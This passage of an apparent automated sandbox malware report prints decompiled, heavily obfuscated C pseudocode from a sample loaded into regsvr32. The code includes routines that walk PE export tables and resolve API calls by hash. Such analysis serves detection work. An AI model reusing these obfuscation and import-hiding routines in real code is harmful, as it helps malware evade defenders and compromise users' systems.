									_t158 = 0x49;
									_v28 = _v28 / _t158;
									_v28 = _v28 >> 1;
									_v28 = _v28 ^ 0x0001b698;
									E04F73FC9(_t175, _v16 | _v20,  &_v4, _a8, _v24, _v12, _a12, _v32, _v28);
								}
							}
						}
						L6:
						return _t175;
					}
					_v32 = 0x3f1f1e;
					_t153 = 0x48;
					_push(_t153);
					_v32 = _v32 / _t153;
					_v32 = _v32 ^ 0xc830dfac;
					_v32 = _v32 ^ 0x15f46172;
					_v32 = _v32 ^ 0xddca51f9;
					_v12 = 0xcdfcb4;
					_v12 = _v12 * 0x3f;
					_v12 = _v12 ^ 0x32b9d517;
					_t175 = E04F73EE6(_t153, _v4 + _v4, __eflags);
					__eflags = _t175;
					if(__eflags == 0) {
						_t132 = 0xa8587;
						goto L13;
					} else {
						_t132 = 0xd50df;
						continue;
					}
					goto L6;
					L13:
					__eflags = _t132 - 0xa8587;
				} while (__eflags != 0);
				goto L6;
			}

0x04f753dc
0x04f753e0
0x04f753e4
0x04f753e8
0x04f753e9
0x04f753ea
0x04f753ef
0x04f753f2
0x04f753fa
0x04f753fc
0x04f75404
0x04f75418
0x04f75418
0x04f75425
0x04f75602
0x00000000
0x04f7542b
0x04f7542d
0x04f7552e
0x04f75538
0x04f7553d
0x04f75545
0x04f7554d
0x04f75553
0x04f75558
0x04f75560
0x04f75565
0x04f7556d
0x04f75575
0x04f7557d
0x04f75585
0x04f7558d
0x04f75592
0x04f7559a
0x04f755a2
0x04f755aa
0x04f755b2
0x04f755ba
0x04f755c2
0x04f755eb
0x04f755f0
0x04f755f3
0x04f755f5
0x04f755fb
0x00000000
0x04f755fb
0x04f75433
0x04f75435
0x00000000
0x04f7543b
0x04f7543b
0x04f75445
0x04f75449
0x04f75451
0x04f75459
0x04f75467
0x04f7546c
0x04f75472
0x04f7547a
0x04f75482
0x04f7548a
0x04f75492
0x04f7549a
0x04f754a2
0x04f754a6
0x04f754ae
0x04f754b6
0x04f754be
0x04f754c6
0x04f754ce
0x04f754d6
0x04f754e2
0x04f754e7
0x04f754ef
0x04f754f3
0x04f7551c
0x04f75521
0x04f75435
0x04f7542d
0x04f75525
0x04f7552d
0x04f7552d
0x04f75609
0x04f75619
0x04f7561c
0x04f7561d
0x04f75621
0x04f75629
0x04f75631
0x04f75639
0x04f75646
0x04f7564a
0x04f75666
0x04f75669
0x04f7566b
0x04f75674
0x00000000
0x04f7566d
0x04f7566d
0x00000000
0x04f7566d
0x00000000
0x04f75679
0x04f75679
0x04f75679
0x00000000

Strings

Ta<, xrefs: 04F7549A
=kt, xrefs: 04F7554D
e", xrefs: 04F75575

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =kt$Ta<$e"
API String ID: 0-3360137053
Opcode ID: ac378805901fa5986d6412f0dfdbd6f3fc71a534ec0ec98fe4aba263e9be01dc
Instruction ID: 57eeb2075c6d8aedbbc5fb2a3f226463bbf27784d84d7dfe6794138b0ac551d1
Opcode Fuzzy Hash: ac378805901fa5986d6412f0dfdbd6f3fc71a534ec0ec98fe4aba263e9be01dc
Instruction Fuzzy Hash: 386142B2508302AFC314CF65D94580FBAE1BBC8748F444E1EF195A6220D3B9DA1ACF97

Uniqueness

Uniqueness Score: -1.00%

Function 04F63FE5 Relevance: 3.9, Strings: 3, Instructions: 145
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04F63FE5(signed int __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t123;
				void* _t125;
				signed int _t128;
				intOrPtr* _t136;
				signed int _t137;
				signed int _t143;
				void* _t144;
				signed int* _t147;

				_t137 = __ecx;
				_push(_a8);
				_t136 = __edx;
				_t143 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t123);
				_v16 = 0xcd8b4;
				_t147 =  &(( &_v44)[4]);
				_v12 = 0xaa6a5;
				_t125 = 0x8ac95;
				_v8 = 0x5a557;
				_t144 = 0;
				_v4 = 0xb6bd7;
				do {
					while(_t125 != 0x371e8) {
						if(_t125 == 0x4d2a1) {
							_v28 = 0xdff191;
							_v28 = _v28 + 0xffff9247;
							_v28 = _v28 + 0xffff6e5b;
							_v28 = _v28 ^ 0x00def232;
							_v40 = 0x976e8;
							_v40 = _v40 >> 9;
							_v40 = _v40 * 0x77;
							_v40 = _v40 >> 3;
							_v40 = _v40 ^ 0x0007d041;
							_v44 = 0xe0a626;
							_v44 = _v44 << 0xb;
							_v44 = _v44 ^ 0x053aed70;
							_v32 = 0xb84b0c;
							_v32 = _v32 + 0xd2fb;
							_v32 = _v32 ^ 0x00bb125c;
							_v24 = 0xbcb495;
							_v24 = _v24 + 0xffff4925;
							_v24 = _v24 ^ 0x00bed0e7;
							_v36 = 0xe56334;
							_v36 = _v36 + 0x44d7;
							_v36 = _v36 << 7;
							_v36 = _v36 ^ 0x137a468e;
							_t114 =  &_v36;
							 *_t114 = _v36 ^ 0x61a594ae;
							__eflags =  *_t114;
							E04F76E07(_v28,  &_v20, _v40, _t143, _v44, _t137, _t144, _v32, _t137, _v24, _t137, _v36);
							 *_t136 = _v20;
						} else {
							if(_t125 == 0x8ac95) {
								_t125 = 0x371e8;
								continue;
							} else {
								_t153 = _t125 - 0x99f08;
								if(_t125 != 0x99f08) {
									goto L11;
								} else {
									_v44 = 0xe1996d;
									_v44 = _v44 ^ 0xe4b46ff4;
									_v44 = _v44 ^ 0x1b46b810;
									_v44 = _v44 + 0x3a7e;
									_v44 = _v44 ^ 0xff1cd4f9;
									_v28 = 0xdb2dc4;
									_v28 = _v28 + 0xffffb5f0;
									_v28 = _v28 ^ 0x00dc8b97;
									_t144 = E04F73EE6(_t137, _v20, _t153);
									_t137 = _t137;
									if(_t144 != 0) {
										_t125 = 0x4d2a1;
										continue;
									}
								}
							}
						}
						L14:
						return _t144;
					}
					_v36 = 0x282b8b;
					_v36 = _v36 >> 0xf;
					_v36 = _v36 * 0x34;
					_v36 = _v36 ^ 0x29a903c8;
					_v36 = _v36 ^ 0x29a91389;
					_v28 = 0x9be783;
					_v28 = _v28 >> 5;
					_v28 = _v28 ^ 0xca5ae943;
					_v28 = _v28 ^ 0xca5c3740;
					_v24 = 0x9cc2e5;
					_v24 = _v24 + 0x1c2e;
					_v24 = _v24 ^ 0x009b2c60;
					_v32 = 0xa0800a;
					_v32 = _v32 ^ 0x53ee8f22;
					_v32 = _v32 * 0x36;
					_v32 = _v32 ^ 0x927148ce;
					_v40 = 0xe34fd5;
					_v40 = _v40 + 0xc36f;
					_v40 = _v40 | 0xfeffdffa;
					_v40 = _v40 ^ 0xfef1f5a3;
					_v44 = 0xe14fa4;
					_v44 = _v44 | 0xa0549301;
					_v44 = _v44 >> 7;
					_v44 = _v44 >> 3;
					_v44 = _v44 ^ 0x0024a14c;
					_t137 = _v36;
					_t128 = E04F76E07(_t137,  &_v20, _v28, _t143, _v24, _t137, 0, _v32, _t137, _v40, _t137, _v44);
					_t147 =  &(_t147[0xa]);
					__eflags = _t128;
					if(__eflags == 0) {
						_t125 = 0x81695;
						goto L11;
					} else {
						_t125 = 0x99f08;
						continue;
					}
					goto L14;
					L11:
					__eflags = _t125 - 0x81695;
				} while (__eflags != 0);
				goto L14;
			}

0x04f63fe5
0x04f63fec
0x04f63ff0
0x04f63ff2
0x04f63ff4
0x04f63ff8
0x04f63ff9
0x04f63ffa
0x04f63fff
0x04f64007
0x04f6400a
0x04f64012
0x04f64017
0x04f6401f
0x04f64021
0x04f6402e
0x04f6402e
0x04f6403b
0x04f641cc
0x04f641d8
0x04f641e0
0x04f641e8
0x04f641f0
0x04f641f8
0x04f64202
0x04f64206
0x04f6420b
0x04f64213
0x04f6421b
0x04f64220
0x04f64228
0x04f64230
0x04f64238
0x04f64240
0x04f64248
0x04f64250
0x04f64258
0x04f64260
0x04f64268
0x04f6426d
0x04f64275
0x04f64275
0x04f64275
0x04f6429a
0x04f642a6
0x04f64041
0x04f64046
0x04f640ba
0x00000000
0x04f64048
0x04f64048
0x04f6404d
0x00000000
0x04f64053
0x04f64053
0x04f6405b
0x04f64063
0x04f6406b
0x04f64073
0x04f6407b
0x04f64083
0x04f6408b
0x04f640a5
0x04f640a7
0x04f640aa
0x04f640b0
0x00000000
0x04f640b0
0x04f640aa
0x04f6404d
0x04f64046
0x04f642a9
0x04f642b1
0x04f642b1
0x04f640c1
0x04f640cd
0x04f640d7
0x04f640db
0x04f640e3
0x04f640eb
0x04f640f3
0x04f640f8
0x04f64100
0x04f64108
0x04f64110
0x04f64118
0x04f64120
0x04f64128
0x04f64135
0x04f64139
0x04f64141
0x04f64149
0x04f64151
0x04f64159
0x04f64161
0x04f64169
0x04f64171
0x04f64176
0x04f6417b
0x04f6419d
0x04f641a1
0x04f641a6
0x04f641a9
0x04f641ab
0x04f641b7
0x00000000
0x04f641ad
0x04f641ad
0x00000000
0x04f641ad
0x00000000
0x04f641bc
0x04f641bc
0x04f641bc
0x00000000

Strings

~:, xrefs: 04F6406B
v, xrefs: 04F641F0
4c, xrefs: 04F64258

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 4c$~:$v
API String ID: 0-2311191241
Opcode ID: 42b3d12953b4457383b0535b31abb674fc45bd68db220f238d9da58aa1ae9682
Instruction ID: 723df673f29c6c9a70182e7dd828cebfaef977762bafb984ac7edf2acd9bb995
Opcode Fuzzy Hash: 42b3d12953b4457383b0535b31abb674fc45bd68db220f238d9da58aa1ae9682
Instruction Fuzzy Hash: 986121B11083829FD358DF24C94A81BBAE4FBD5758F000E1DF095A6261D3B9DA4ACF97

Uniqueness

Uniqueness Score: -1.00%

Function 04F7F05E Relevance: 3.9, Strings: 3, Instructions: 117
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04F7F05E(void* __ecx, void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t98;
				void* _t101;
				signed short _t107;
				signed short _t109;
				signed short _t114;
				signed int _t115;
				signed short* _t117;
				signed int _t119;
				intOrPtr _t127;
				signed int _t136;
				signed short _t137;
				signed short _t139;
				signed int* _t141;

				_push(_a12);
				_t136 = _a4;
				_push(_a8);
				_push(_t136);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t98);
				_v4 = _v4 & 0x00000000;
				_t141 =  &(( &_v28)[5]);
				_v12 = 0xcf9e8;
				_t101 =  *((intOrPtr*)(_t136 + 0x3c)) + _t136;
				_v8 = 0x1a049;
				_a4 = 0xbb49ca;
				_a4 = _a4 ^ 0xd8118c2c;
				_a4 = _a4 >> 0xd;
				_a4 = _a4 << 0xb;
				_a4 = _a4 ^ 0x362ab001;
				_t119 = _a4;
				_t127 =  *((intOrPtr*)(_t101 + 0x78 + _t119 * 8));
				if(_t127 == 0 ||  *((intOrPtr*)(_t101 + 0x7c + _t119 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t137 = _t127 + _t136;
					while(1) {
						_t104 =  *((intOrPtr*)(_t137 + 0xc));
						if( *((intOrPtr*)(_t137 + 0xc)) == 0) {
							goto L13;
						}
						_a4 = 0x2bd947;
						_a4 = _a4 + 0xffff3439;
						_t115 = 0x48;
						_a4 = _a4 / _t115;
						_a4 = _a4 + 0x2f42;
						_a4 = _a4 ^ 0x00061a7f;
						_v28 = 0xa395f6;
						_v28 = _v28 >> 3;
						_v28 = _v28 ^ 0x001015d2;
						_t107 = E04F7C6D9(_a4, _v28, _t104 + _t136);
						_v16 = _t107;
						__eflags = _t107;
						if(_t107 == 0) {
							L15:
							return 0;
						}
						_t117 =  *_t137 + _t136;
						_t139 =  *((intOrPtr*)(_t137 + 0x10)) + _t136;
						while(1) {
							_t109 =  *_t117;
							__eflags = _t109;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t124 = _t136 + 2 + _t109;
								__eflags = _t136 + 2 + _t109;
							} else {
								_t124 = _t109 & 0x0000ffff;
							}
							_v20 = 0xb2af1a;
							_a4 = 0x1d;
							_v20 = _v20 / _a4;
							_v20 = _v20 ^ 0x00091479;
							_v28 = 0x86853e;
							_v28 = _v28 + 0x4eed;
							_v28 = _v28 + 0x9e9f;
							_v28 = _v28 << 0xd;
							_v28 = _v28 ^ 0xee56bcf8;
							_v24 = 0x8da4e3;
							_v24 = _v24 + 0xffff4fa3;
							_v24 = _v24 ^ 0x008ab352;
							_a4 = 0x9978fe;
							_a4 = _a4 | 0xcb2f3cf9;
							_a4 = 0x4a;
							_a4 = _a4 / _a4;
							_a4 = _a4 >> 7;
							_a4 = _a4 ^ 0x000703d5;
							_t114 = E04F79B62(_v20, _v16, _t124, _v28, _v24, _a4);
							_t141 =  &(_t141[4]);
							__eflags = _t114;
							if(_t114 == 0) {
								goto L15;
							} else {
								 *_t139 = _t114;
								_t117 =  &(_t117[2]);
								_t139 =  &_a4;
								__eflags = _t139;
								continue;
							}
						}
						_t137 = _t137 + 0x14;
						__eflags = _t137;
					}
					goto L13;
				}
			}

0x04f7f065
0x04f7f069
0x04f7f06d
0x04f7f071
0x04f7f072
0x04f7f073
0x04f7f074
0x04f7f079
0x04f7f07e
0x04f7f084
0x04f7f08c
0x04f7f08e
0x04f7f096
0x04f7f09e
0x04f7f0a6
0x04f7f0ab
0x04f7f0b0
0x04f7f0b8
0x04f7f0bc
0x04f7f0c2
0x04f7f22f
0x00000000
0x04f7f0d3
0x04f7f0d3
0x04f7f224
0x04f7f224
0x04f7f229
0x00000000
0x00000000
0x04f7f0db
0x04f7f0e6
0x04f7f0f6
0x04f7f0fa
0x04f7f0fe
0x04f7f106
0x04f7f10e
0x04f7f116
0x04f7f11b
0x04f7f12b
0x04f7f130
0x04f7f135
0x04f7f137
0x04f7f23a
0x00000000
0x04f7f23a
0x04f7f142
0x04f7f144
0x04f7f217
0x04f7f217
0x04f7f219
0x04f7f21b
0x00000000
0x00000000
0x04f7f14b
0x04f7f155
0x04f7f155
0x04f7f14d
0x04f7f14d
0x04f7f14d
0x04f7f157
0x04f7f165
0x04f7f173
0x04f7f177
0x04f7f17f
0x04f7f187
0x04f7f18f
0x04f7f197
0x04f7f19c
0x04f7f1a4
0x04f7f1ac
0x04f7f1b4
0x04f7f1bc
0x04f7f1c4
0x04f7f1d0
0x04f7f1e0
0x04f7f1e4
0x04f7f1e9
0x04f7f202
0x04f7f207
0x04f7f20a
0x04f7f20c
0x00000000
0x04f7f20e
0x04f7f20e
0x04f7f211
0x04f7f214
0x04f7f214
0x00000000
0x04f7f214
0x04f7f20c
0x04f7f221
0x04f7f221
0x04f7f221
0x00000000
0x04f7f224

Strings

N, xrefs: 04F7F187
J, xrefs: 04F7F1D0
B/, xrefs: 04F7F0FE

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: B/$J$N
API String ID: 0-391816885
Opcode ID: ba3488cab1b063af47e27e808ab9a1b5d1fadb597992f3ccba7e49ae946c53ec
Instruction ID: de358684e397f1e0d61cc7c2295b2b3ba1a0d1bb2c1c8ac5533c49f886a12d78
Opcode Fuzzy Hash: ba3488cab1b063af47e27e808ab9a1b5d1fadb597992f3ccba7e49ae946c53ec
Instruction Fuzzy Hash: DF519CB1618381EFD384DF15D88891BBBE0FFD4348F80592DF98582210E3B8E909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04F7E10C Relevance: 3.9, Strings: 3, Instructions: 113
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E04F7E10C(void* __ecx, void* __edx) {
				void* _t98;
				intOrPtr _t102;
				signed int _t113;
				void* _t122;
				signed int _t124;
				signed int _t139;
				intOrPtr* _t140;
				void* _t143;
				void* _t144;
				void* _t145;

				_push( *((intOrPtr*)(_t144 + 0x54)));
				_t143 = __edx;
				_push( *((intOrPtr*)(_t144 + 0x54)));
				_push( *((intOrPtr*)(_t144 + 0x54)));
				_push( *((intOrPtr*)(_t144 + 0x54)));
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t98);
				 *((intOrPtr*)(_t144 + 0x4c)) = 0xbe960;
				_t140 = 0;
				asm("stosd");
				_t145 = _t144 + 0x18;
				asm("stosd");
				asm("stosd");
				_t139 = 0;
				 *(_t145 + 0x1c) = 0xe2c7c2;
				_t102 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
				 *(_t145 + 0x1c) =  *(_t145 + 0x1c) + 0xff29;
				 *(_t145 + 0x1c) =  *(_t145 + 0x1c) + 0x9a1;
				 *(_t145 + 0x1c) =  *(_t145 + 0x1c) ^ 0x00e3d08c;
				_t124 =  *(_t145 + 0x1c);
				 *((intOrPtr*)(_t145 + 0x2c)) = _t102;
				 *(_t145 + 0x30) = _t124;
				_t122 =  *((intOrPtr*)(_t102 + 0x78 + _t124 * 8)) + __edx;
				 *((intOrPtr*)(_t145 + 0x28)) =  *((intOrPtr*)(_t122 + 0x1c)) + __edx;
				_t126 =  *((intOrPtr*)(_t122 + 0x20)) + __edx;
				 *((intOrPtr*)(_t145 + 0x20)) =  *((intOrPtr*)(_t122 + 0x20)) + __edx;
				 *((intOrPtr*)(_t145 + 0x24)) =  *((intOrPtr*)(_t122 + 0x24)) + __edx;
				if( *((intOrPtr*)(_t122 + 0x18)) <= 0) {
					L7:
					return _t140;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					 *(_t145 + 0x1c) = 0x872279;
					 *(_t145 + 0x1c) =  *(_t145 + 0x1c) + 0xffff408e;
					 *(_t145 + 0x1c) =  *(_t145 + 0x1c) << 5;
					 *(_t145 + 0x1c) =  *(_t145 + 0x1c) | 0x10731c22;
					 *(_t145 + 0x1c) =  *(_t145 + 0x1c) ^ 0x10fddd90;
					 *(_t145 + 0x18) = 0x89b82a;
					 *(_t145 + 0x18) =  *(_t145 + 0x18) + 0x4669;
					 *(_t145 + 0x18) = 0x47;
					 *(_t145 + 0x18) =  *(_t145 + 0x18) /  *(_t145 + 0x18);
					 *(_t145 + 0x18) =  *(_t145 + 0x18) << 0xc;
					 *(_t145 + 0x18) =  *(_t145 + 0x18) ^ 0x1f127871;
					 *(_t145 + 0x14) = 0x300837;
					 *(_t145 + 0x14) =  *(_t145 + 0x14) >> 5;
					 *(_t145 + 0x14) =  *(_t145 + 0x14) | 0x7443e44a;
					_t60 = _t145 + 0x14; // 0x7443e44a
					 *(_t145 + 0x14) = 0x29;
					 *(_t145 + 0x18) =  *_t60 /  *(_t145 + 0x14);
					 *(_t145 + 0x18) =  *(_t145 + 0x18) ^ 0x02d8e52e;
					 *(_t145 + 0x14) = 0xaffda2;
					 *(_t145 + 0x14) =  *(_t145 + 0x14) | 0x4be4ffda;
					 *(_t145 + 0x14) =  *(_t145 + 0x14) * 0x4c;
					 *(_t145 + 0x14) =  *(_t145 + 0x14) >> 0x10;
					 *(_t145 + 0x14) =  *(_t145 + 0x14) ^ 0x000af904;
					_t113 = E04F61918( *((intOrPtr*)(_t145 + 0x24)),  *(_t145 + 0x1c),  *(_t145 + 0x14),  *((intOrPtr*)(_t126 + _t139 * 4)) + _t143);
					_t145 = _t145 + 0xc;
					if((_t113 ^ 0x3038c829) ==  *((intOrPtr*)(_t145 + 0x54))) {
						break;
					}
					_t126 =  *((intOrPtr*)(_t145 + 0x20));
					_t139 = _t139 + 1;
					if(_t139 <  *((intOrPtr*)(_t122 + 0x18))) {
						continue;
					}
					goto L7;
				}
				_t140 =  *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x28)) + ( *( *((intOrPtr*)(_t145 + 0x24)) + _t139 * 2) & 0x0000ffff) * 4)) + _t143;
				if(_t140 >= _t122 && _t140 <  *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x2c)) + 0x7c +  *(_t145 + 0x30) * 8)) + _t122) {
					_t140 = E04F75689(_t140);
				}
				goto L7;
			}

0x04f7e113
0x04f7e117
0x04f7e119
0x04f7e11d
0x04f7e121
0x04f7e125
0x04f7e126
0x04f7e127
0x04f7e12e
0x04f7e13a
0x04f7e13c
0x04f7e13d
0x04f7e140
0x04f7e141
0x04f7e145
0x04f7e147
0x04f7e14f
0x04f7e151
0x04f7e159
0x04f7e161
0x04f7e169
0x04f7e16d
0x04f7e171
0x04f7e179
0x04f7e183
0x04f7e187
0x04f7e18e
0x04f7e192
0x04f7e199
0x04f7e2ba
0x04f7e2c2
0x00000000
0x00000000
0x00000000
0x04f7e19f
0x04f7e19f
0x04f7e1a4
0x04f7e1ae
0x04f7e1b6
0x04f7e1bb
0x04f7e1c3
0x04f7e1cb
0x04f7e1d3
0x04f7e1df
0x04f7e1ed
0x04f7e1f1
0x04f7e1f6
0x04f7e1fe
0x04f7e206
0x04f7e20b
0x04f7e213
0x04f7e217
0x04f7e224
0x04f7e228
0x04f7e230
0x04f7e238
0x04f7e245
0x04f7e249
0x04f7e24e
0x04f7e266
0x04f7e270
0x04f7e277
0x00000000
0x00000000
0x04f7e279
0x04f7e27d
0x04f7e281
0x00000000
0x00000000
0x00000000
0x04f7e287
0x04f7e298
0x04f7e29c
0x04f7e2b7
0x04f7e2b7
0x00000000

Strings

iF, xrefs: 04F7E1D3
JCt, xrefs: 04F7E213
G, xrefs: 04F7E1DF

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: G$JCt$iF
API String ID: 0-1554862265
Opcode ID: 7cabfbf4b2375b57556513d7b93a6940323bd736bb68e632dcaa71fd69fc8366
Instruction ID: 8868e6256a21b42813d64d9a03abd59bcf64a9de61815a3151f4afc7a819f112
Opcode Fuzzy Hash: 7cabfbf4b2375b57556513d7b93a6940323bd736bb68e632dcaa71fd69fc8366
Instruction Fuzzy Hash: 834123715083029FC314CF69D98581AFBE1EBC8748F11486EF985A7221D3B5EA1ACFD6

Uniqueness

Uniqueness Score: -1.00%

Function 04F654B9 Relevance: 3.9, Strings: 3, Instructions: 109
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E04F654B9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t73;
				void* _t75;
				signed int _t81;
				signed int _t93;
				intOrPtr _t106;
				signed int* _t109;

				_push(_a16);
				_t105 = _a4;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t73);
				_t109 =  &(( &_v60)[6]);
				_v48 = 0xb5ca6;
				_t106 = 0;
				_v44 = 0xe82e2;
				_v40 = 0;
				_t75 = 0x8237d;
				do {
					while(_t75 != 0x5a5e0) {
						if(_t75 == 0x71332) {
							_v52 = 0x65093a;
							_v52 = _v52 ^ 0x276e6256;
							_v52 = _v52 ^ 0x2704cc37;
							_v60 = 0x4ff574;
							_v60 = _v60 + 0x2971;
							_v60 = _v60 | 0xd14dabea;
							_v60 = _v60 ^ 0xc4c49eac;
							_v60 = _v60 ^ 0x15940d23;
							_v56 = 0x9561da;
							_v56 = _v56 + 0xffff951c;
							_v56 = _v56 << 0xb;
							_v56 = _v56 ^ 0xa7b03296;
							_t81 = E04F7BF19(_v52, _t105, _v60,  &_v36, _v56);
							_t109 =  &(_t109[3]);
							__eflags = _t81;
							if(__eflags != 0) {
								_t75 = 0x93093;
								continue;
							}
						} else {
							if(_t75 == 0x8237d) {
								_t75 = 0x5a5e0;
								continue;
							} else {
								_t114 = _t75 - 0x93093;
								if(_t75 != 0x93093) {
									goto L11;
								} else {
									_v56 = 0xc60af9;
									_v56 = _v56 << 0xa;
									_v56 = _v56 + 0xffff1d49;
									_v56 = _v56 >> 6;
									_v56 = _v56 ^ 0x0068fdba;
									_v60 = 0xcbcdd5;
									_v60 = _v60 + 0x3ac5;
									_v60 = _v60 + 0xffff0c81;
									_t93 = 0x56;
									_v60 = _v60 / _t93;
									_v60 = _v60 ^ 0x000d0140;
									E04F6D362(_v56, _v60, _t114,  &_v36, _t105 + 4);
									_t106 =  !=  ? 1 : _t106;
								}
							}
						}
						L6:
						return _t106;
					}
					_v56 = 0xeb3a1f;
					_v56 = _v56 * 0x42;
					_v56 = _v56 ^ 0x3ca5a5ce;
					_v52 = 0xea5e36;
					_v52 = _v52 | 0xa055eb3e;
					_t69 =  &_v52;
					 *_t69 = _v52 ^ 0xa0f323b9;
					__eflags =  *_t69;
					E04F80484(_v56, _a8,  &_v36, _v52);
					_t75 = 0x71332;
					L11:
					__eflags = _t75 - 0xd8a27;
				} while (__eflags != 0);
				goto L6;
			}

0x04f654c0
0x04f654c4
0x04f654c8
0x04f654cc
0x04f654d0
0x04f654d1
0x04f654d2
0x04f654d3
0x04f654d8
0x04f654db
0x04f654e3
0x04f654e5
0x04f654ed
0x04f654f1
0x04f65500
0x04f65500
0x04f6550d
0x04f655a8
0x04f655b4
0x04f655be
0x04f655c6
0x04f655ce
0x04f655d6
0x04f655de
0x04f655e6
0x04f655ee
0x04f655f6
0x04f655fe
0x04f65603
0x04f65618
0x04f6561d
0x04f65620
0x04f65622
0x04f65628
0x00000000
0x04f65628
0x04f65513
0x04f65518
0x04f655a1
0x00000000
0x04f6551e
0x04f6551e
0x04f65520
0x00000000
0x04f65526
0x04f65526
0x04f65530
0x04f65535
0x04f6553d
0x04f65542
0x04f6554a
0x04f65552
0x04f6555a
0x04f65568
0x04f6556b
0x04f65572
0x04f65588
0x04f65594
0x04f65594
0x04f65520
0x04f65518
0x04f65598
0x04f655a0
0x04f655a0
0x04f65633
0x04f65640
0x04f65648
0x04f65650
0x04f65658
0x04f65660
0x04f65660
0x04f65660
0x04f65671
0x04f65678
0x04f6567d
0x04f6567d
0x04f6567d
0x00000000

Strings

6^, xrefs: 04F65650
Vbn', xrefs: 04F655B4
q), xrefs: 04F655CE

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 6^$Vbn'$q)
API String ID: 0-663298881
Opcode ID: 43a5dcf4283d48ddb03f65a6a08dafed2bfa516213ad1bf505da674280cc7cf5
Instruction ID: 571502e76eb3ccc29a1196444398c017b2807f087146a20daadea885becd56d4
Opcode Fuzzy Hash: 43a5dcf4283d48ddb03f65a6a08dafed2bfa516213ad1bf505da674280cc7cf5
Instruction Fuzzy Hash: 994169B25083429BD314CF64E94981BBBE5FBC4758F104E1EF496A6221D7B4DA0DCB93

Uniqueness

Uniqueness Score: -1.00%

Function 04F6260B Relevance: 2.8, Strings: 2, Instructions: 308
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E04F6260B(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32) {
				intOrPtr _v60;
				char _v68;
				void* _v80;
				intOrPtr _v84;
				char _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t310;
				void* _t313;
				void* _t317;
				intOrPtr _t355;
				signed int _t361;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t367;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				char _t403;
				char _t404;
				signed int* _t407;

				_t360 = __ecx;
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t310);
